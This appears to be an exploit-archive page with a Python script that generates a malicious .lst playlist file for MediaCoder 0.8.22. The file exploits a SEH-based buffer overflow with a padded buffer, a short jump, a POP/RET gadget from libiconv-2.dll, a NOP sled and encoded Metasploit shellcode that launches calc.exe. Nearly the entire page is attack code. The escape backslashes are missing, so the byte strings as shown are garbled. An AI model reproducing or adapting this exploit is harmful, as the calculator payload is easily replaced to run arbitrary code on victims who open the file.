[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mediacoder (.lst) - SEH Buffer Overflow
# Published : 2013-06-24
# Author :
# Previous Title : FreeBSD 9 Address Space Manipulation Privilege Escalation
# Next Title : ABBS Audio Media Player .LST Buffer Overflow
#!/usr/bin/python
import os
import sys
from struct import pack
from time import sleep
if os.name == "nt":
os.system("cls")
os.system("color 3f")
else:
os.system("clear")
print """
[+]Exploit Title: All Mediacoder Product SEH Buffer Overflow
[+]Download All Product: http://www.mediacoderhq.com/editions.html
[+]Vulnerable Product:!
[+]Mediacoder 0.8.22.5525
[+]Mediacoder Web Video Edition 0.8.22
[+]Mediacoder Handsets Edition 0.8.22
[+]Mediacoder iPhone Edition 0.8.22
[+]MediaCoder-PSP Edition 0.8.22
[+]Vulnerabilities File Format:lst
[+]Date (found): 21.06.2013
[+]Date (publish): 21.06.2013
[+]Founder: metacom
[+]RST
[+]Tested on: Windows Xp pro-sp3 English
"""
buffer = "http://" + "x41" * 845
nseh = "xEBx06xFFxFF"
seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll
nops= "x90" * 80
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b 'x00x0ax0dx5c' -t c
shell= ("xbfx8exa0x35xacxdaxdaxd9x74x24xf4x5bx2bxc9xb1"
"x33x83xc3x04x31x7bx0ex03xf5xaexd7x59xf5x47x9e"
"xa2x05x98xc1x2bxe0xa9xd3x48x61x9bxe3x1bx27x10"
"x8fx4exd3xa3xfdx46xd4x04x4bxb1xdbx95x7dx7dxb7"
"x56x1fx01xc5x8axffx38x06xdfxfex7dx7ax10x52xd5"
"xf1x83x43x52x47x18x65xb4xccx20x1dxb1x12xd4x97"
"xb8x42x45xa3xf3x7axedxebx23x7bx22xe8x18x32x4f"
"xdbxebxc5x99x15x13xf4xe5xfax2ax39xe8x03x6axfd"
"x13x76x80xfexaex81x53x7dx75x07x46x25xfexbfxa2"
"xd4xd3x26x20xdax98x2dx6exfex1fxe1x04xfax94x04"
"xcbx8bxefx22xcfxd0xb4x4bx56xbcx1bx73x88x18xc3"
"xd1xc2x8ax10x63x89xc0xe7xe1xb7xadxe8xf9xb7x9d"
"x80xc8x3cx72xd6xd4x96x37x28x9fxbbx11xa1x46x2e"
"x20xacx78x84x66xc9xfax2dx16x2exe2x47x13x6axa4"
"xb4x69xe3x41xbbxdex04x40xd8x81x96x08x31x24x1f"
"xaax4d")
exploit = buffer + nseh + seh + nops + shell
try:
rst= open("All-MediaCoder.lst",'w')
rst.write(exploit)
rst.close()
raw_input("nExploit file created!n")
except:
print "Error"